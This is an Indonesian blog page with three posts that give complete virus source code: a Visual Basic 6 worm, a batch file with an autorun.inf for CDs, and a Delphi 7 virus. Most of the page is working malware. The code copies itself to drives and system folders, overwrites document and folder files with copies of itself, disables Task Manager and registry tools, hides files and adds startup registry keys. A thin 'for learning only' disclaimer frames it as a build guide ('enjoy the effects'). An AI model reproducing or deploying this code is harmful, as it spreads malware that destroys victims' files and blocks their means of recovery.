Membuat Virus HalooMom

12 Juli, 2008

Peringatan

Artikel ini hanya untuk pembelajaran saja, menyalah gunakan artikel ini bukan tanggung jawab penulis.

Sebelum menulis kode di bawah ini, pertama-tama program aplikasi Visual Basic 6 harus sudah terinstalasi di komputer Anda. Setelah itu buka project baru dan masukkan sebuah modul di dalam project Anda. Tapi ingat setelah Anda memberikan sebuah modul, hilangkan form1 Anda. Setelah itu pada Properties Project ganti startup aplikasi Anda dari Form1 ke Sub Main. Setelah itu ketik kode di bawah ini.

Code:
Private Declare Function GetDriveType Lib “kernel32″ _
Alias “GetDriveTypeA” (ByVal nDrive As String) As Long
Private Declare Function GetWindowsDirectory Lib “kernel32″ _
Alias “GetWindowsDirectoryA” (ByVal ipBuffer As String, ByVal nSize As Long) As Long

Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_SYSTEM = &H4
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Const FILE_ATTRIBUTE_COMPRESSED = &H800
Private Const MAX_PATH = 260

Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type

Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type

Private Declare Function FindFirstFile Lib “kernel32″ Alias “FindFirstFileA” _
(ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib “kernel32″ Alias “FindNextFileA” _
(ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindClose Lib “kernel32″ (ByVal hFindFile As Long) As Long
Private Declare Function CopyFile Lib “kernel32″ Alias “CopyFileA” _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Private pbMessage As Boolean

Private Function DriveType(Drive As String) As String
Dim sAns As String, lAns As Long
If Len(Drive) = 1 Then Drive = Drive & “:\”
If Len(Drive) = 2 And Right$(Drive, 1) = “:” Then Drive = Drive & “\”
lAns = GetDriveType(Drive)
Select Case lAns
Case 2
sAns = “Removable Drive”
Case 3
sAns = “Fixed Drive”
Case 4
sAns = “Remote Drive”
Case 5
sAns = “CD-ROM”
Case 6
sAns = “RAM Disk”
Case Else
sAns = “Drive Doesn’t Exist”
End Select
DriveType = sAns
End Function

Private Sub kodepengganda()
Dim ictr As Integer
Dim sDrive As String
Dim x As Byte
ReDim sDrives(0) As String
For ictr = 65 To 90
sDrive = Chr(ictr) & “:\”
If DriveType(sDrive) <> “Drive Doesn’t Exist” Then
On Error Resume Next
FileCopy App.Path & “\” & App.EXEName & “.exe”, sDrive & “HalooMom.exe”
End If
Next
End Sub

Private Sub kopikewindows()
Dim Buffer As String * 255
Dim x As Long
x = GetWindowsDirectory(Buffer, 255)
On Error Resume Next
FileCopy App.Path & “\” & App.EXEName & “.exe”, Left(Buffer, x) & “\Readme.exe”
End Sub

Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value
End Sub

Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value, “REG_DWORD”
End Sub

Sub kodepertahanan()
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue”, 2
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue”, 2
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1
Dim titik As String
titik = “”"”
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IKernel”, titik & “C:\Windows\Readme.exe” & titik
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HalooMom”, titik & “C:\HalooMom.exe” & titik
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption”, titik & “www.jombang-city.net” & titik
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext”, titik & “Ibu adalah orang yang melahirkan kita jadi jangan pernah durhaka kepadanya” & titik
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1
End Sub

Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = “*.*”)
Screen.MousePointer = vbHourglass
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
fPath = AddBackSlash(Path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile “C:\Windows\Readme.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”, 1
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile “C:\Windows\Readme.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”, 1
End If
Wend
End If
If SubFolder Then
hFile = FindFirstFile(fPath & “*.*”, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
Screen.MousePointer = vbDefault
End Sub

Private Function StripNulls(f As String) As String
StripNulls = Left$(f, InStr(1, f, Chr$(0)) – 1)
End Function

Private Function AddBackSlash(S As String) As String
If Len(S) Then
If Right$(S, 1) <> “\” Then
AddBackSlash = S & “\”
Else
AddBackSlash = S
End If
Else
AddBackSlash = “\”
End If
End Function

Sub Manipulasi()
GetFiles “C:”, True, “*.DOC”
GetFiles “D:”, True, “*.DOC”
GetFiles “E:”, True, “*.DOC”
GetFiles “F:”, True, “*.DOC”
End Sub

Sub Main()
kodepengganda
kopikewindows
Manipulasi
kodepertahanan
Call Ulang
End Sub

Sub Ulang()
Call Main
End Sub

1 Komentar | Artikel, Komputer | Ditandai: , | Permalink
Ditulis oleh virmon

Buat Virus Sederhana dengan Notepad

12 Juli, 2008

virus ini efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! Very Happy Very Happy tapi yg penting gak ke-detect ama anti virus(setahu saya….. Question Question )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri… Cool Cool

note: Idea “HANYA BEKERJA PADA WINDOWS XP” Idea

caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… Laughing ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

Catatan:

1. Ini hanya untuk pembelajaran saja

2. Kami tidak bertanggung jawab atas penyalah gunaan Artikel di atas

3. Selamat bersenang-senang

& Komentar | Artikel, Komputer | Ditandai: , | Permalink
Ditulis oleh virmon

Membuat Virus dengan Delphi 7

12 Juli, 2008

Ini kode untuk membuat virus dengan Delphi 7, ketik kode di bawah ini atau bisa kopi paste. Dan ingat kode di bawah hanya untuk pembelajaran saja, dan kami tidak bertanggung jawab penyalah gunaan kode di bawah ini:

unit Unit1;

interface
{Deklarasi ShellApi Yang Digunakan}
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,Shellapi,registry, Mmsystem, StdCtrls, ExtCtrls, jpeg;

type
TForm1 = class(TForm)
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);

private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}
{{$R MySoundRes.RES}

procedure TForm1.FormCreate(Sender: TObject);

{Deklarasi variabel}
var
regis: TRegistry;
APath: string;
MySearch: TSearchRec;
dir : string;
{i : integer;}
{x : integer;}
{F:TextFile;}
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
{form tak terlihat}
Application.ShowMainForm := false;
{copy dulu ah}
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{menjalankan service tak terlihat}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{men-disable TASK MANAGER}
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;

regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{membuat key di registry biar auto run gitu}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{membuat key registry di runonce}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{menginfeksi file}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
copyFile (pchar(application.ExeName),pchar(APath+’\’+MySearch.Name),false);
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{merubah file yg terinfeksi}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
renamefile (pchar(APath+’\’+MySearch.Name),pchar(APath+’\’+MySearch.Name+’.exe’));
renamefile (pchar(application.ExeName+’.exe’),pchar(application.ExeName));
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
procedure TForm1.Timer1Timer(Sender: TObject);
{terus perhatiin yah}
{deklarasi variabel}
var
regis: TRegistry;
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{tetep jalanin virus secara tak terlihat}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{mendisable task manager}
begin
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{bikin lagi key registry}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
try
ShellExecute(0, ‘open’, ‘www.imm.or.id’, nil, nil, SW_NORMAL);
mciSendString(’dadan cakep deh’, nil, 0, handle);
except
end;
timer2.Enabled:= true;
timer1.Enabled:= false;
end;

procedure TForm1.Timer2Timer(Sender: TObject);
begin
try
mciSendString(’dadan memang cakep’, nil, 0, handle);
except
end;
timer1.Enabled:= true;
timer2.Enabled:= false;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
end;
end.

Leave a Comment » | Artikel, Komputer | Ditandai: , | Permalink
Ditulis oleh virmon

« Entri Sebelumnya